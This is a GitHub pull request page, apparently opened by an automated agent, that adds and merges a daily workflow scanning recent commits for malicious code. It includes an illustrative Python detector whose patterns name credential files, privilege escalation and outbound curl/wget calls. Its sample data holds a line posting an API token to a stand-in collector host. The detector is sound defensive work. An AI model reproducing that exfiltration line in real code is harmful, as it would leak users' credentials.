Add Daily Malicious Code Scan workflow#183

Merged
dsyme merged 2 commits into main from add-malicious-code-scan-57413046a78d2d3c
Feb 21, 2026

Conversation

@github-actions
Contributor

This PR adds a new Daily Malicious Code Scan security workflow, along with its documentation page and README entry.

Phase 1: Consistency Check

No inconsistencies were found between ./workflows/, ./docs/, and README.md. All workflow files have matching docs pages and README entries.

Phase 2: New Workflow — Daily Malicious Code Scan

Source

Adapted from daily-malicious-code-scan.md in the gh-aw repository.

Merge Rate

The security workflow family is documented in the [Security-related Workflows blog post](github.github.io/redacted). The Daily Malicious Code Scan complements other security tools (CodeQL, Dependabot) with change-focused analysis of recent commits.

Why It's Valuable

As AI-assisted code generation becomes common, new supply chain risks emerge — a compromised agent or dependency could silently inject credential-harvesting code, a crypto miner, or a backdoor. This workflow:

  • Runs daily and scans all files changed in the last 3 days
  • Looks for secret exfiltration patterns, suspicious network calls, obfuscated code, out-of-context additions, and privilege escalation
  • Reports findings as GitHub native code-scanning alerts (visible in the Security tab alongside CodeQL and Dependabot)
  • Provides threat scores and actionable remediation steps
  • Works with any programming language — no configuration required

Generalization Plan

The original workflow contained Go-specific file location checks (e.g., verifying Go files are inside cmd/ or pkg/ directories). These were replaced with language-agnostic checks:

  • Removed: Go-specific directory structure validation
  • Added: General checks for executable files added to source directories
  • Added: General base64 payload detection pattern
  • Kept: Core secret exfiltration, suspicious network, system operations, and obfuscation detection logic unchanged
  • Kept: create-code-scanning-alert output (GitHub native, works in any repo)

Files Changed

  • workflows/daily-malicious-code-scan.md — generalized workflow spec
  • docs/daily-malicious-code-scan.md — documentation page
  • README.md — new "Security Workflows" section with entry

Generated by Daily Repo Goal Achiever

Adds a new security workflow that reviews recent code changes for
suspicious patterns indicating malicious activity or supply chain attacks.

The workflow scans all files changed in the last 3 days and looks for:
- Secret exfiltration patterns (credentials + external network calls)
- Out-of-context code additions (executables in source dirs, encoded payloads)
- Suspicious system operations (sensitive file access, privilege escalation)
- Code obfuscation (base64/hex payloads, obscure naming)

Findings are published as GitHub code-scanning alerts in the Security tab.

Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
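The checks the description and commit message list (a credential reference next to an outbound network call, base64 payloads, executables added to source directories, privilege-escalation commands) and the per-file threat score, as an added Python example that is not the workflow's own prompt or code. The regexes, source-directory list, scores and sample files are assumptions, and a dict of path to content stands in for the files changed in the last 3 days.

```python
import base64, binascii, re
from typing import NamedTuple
# Heuristic rules for the categories the workflow lists (assumed patterns, not the project's own).
SECRET_RE = re.compile(r"(?i)(api[_-]?key|secret|token|password|passwd)\w*\s*[:=]")
NETWORK_RE = re.compile(r"(?i)(https?://[\w.-]+|requests\.(get|post)\(|urllib\.request|fetch\(|\b(curl|wget)\s)")
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
PRIV_RE = re.compile(r"(?i)(\bsudo\s|chmod\s+[2467]\d{3}\b|setuid\(|/etc/(passwd|shadow|sudoers))")
SOURCE_DIRS = ("src/", "lib/", "cmd/", "pkg/")  # assumed source roots
EXEC_EXTS = (".exe", ".dll", ".so", ".dylib", ".bin")

class Finding(NamedTuple):
    path: str
    rule: str
    score: int  # 1-10, higher is more suspicious; used as the alert severity

def looks_like_base64_payload(blob: str) -> bool:
    """True when a long run decodes as base64 and is not merely a hex digest (commit SHA, hash)."""
    if re.fullmatch(r"[0-9a-fA-F]+", blob):
        return False
    try:
        base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return True
    except (binascii.Error, ValueError):
        return False

def scan_file(path: str, text: str) -> list[Finding]:
    found: list[Finding] = []
    if path.startswith(SOURCE_DIRS) and path.lower().endswith(EXEC_EXTS):
        found.append(Finding(path, "executable-in-source", 8))
    # A credential reference and an outbound call in the same changed file is the exfiltration signal.
    if SECRET_RE.search(text) and NETWORK_RE.search(text):
        found.append(Finding(path, "secret-exfiltration", 9))
    if any(looks_like_base64_payload(m.group(0)) for m in BASE64_RE.finditer(text)):
        found.append(Finding(path, "base64-payload", 6))
    if PRIV_RE.search(text):
        found.append(Finding(path, "privilege-escalation", 7))
    return found

def scan_changes(changes: dict[str, str]) -> list[Finding]:  # path -> content; stands in for the git diff
    return [f for path, text in changes.items() for f in scan_file(path, text)]

def threat_scores(findings: list[Finding]) -> dict[str, int]:  # per-file score: highest rule that fired
    return {p: max(f.score for f in findings if f.path == p) for p in {f.path for f in findings}}

SAMPLE_CHANGES = {  # constructed sample changes, not taken from any real repository
    "src/config.py": 'TOKEN = os.environ["API_TOKEN"]\nrequests.post("https://collector.example.invalid/v1", data=TOKEN)\n',
    "src/util.py": "BLOB = " + base64.b64encode(b"constructed sample blob for the detector").decode(),
    "lib/helper.bin": "",
    "README.md": "Commit 3f2a9c1d8e7b6a5f4c3d2e1f0a9b8c7d6e5f4a3b fixed the build.\n",
}
```

In the real workflow each finding would become a code-scanning alert; the hex-digest check in looks_like_base64_payload is what keeps commit SHAs in a changelog from firing the base64 rule.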
@dsyme
Contributor

dsyme commented Feb 21, 2026

This is too corner case

@dsyme dsyme closed this Feb 21, 2026
@dsyme dsyme reopened this Feb 21, 2026
@dsyme dsyme marked this pull request as ready for review February 21, 2026 03:43
@dsyme dsyme merged commit 6e3afce into main Feb 21, 2026
1 check passed
@dsyme dsyme deleted the add-malicious-code-scan-57413046a78d2d3c branch February 21, 2026 03:44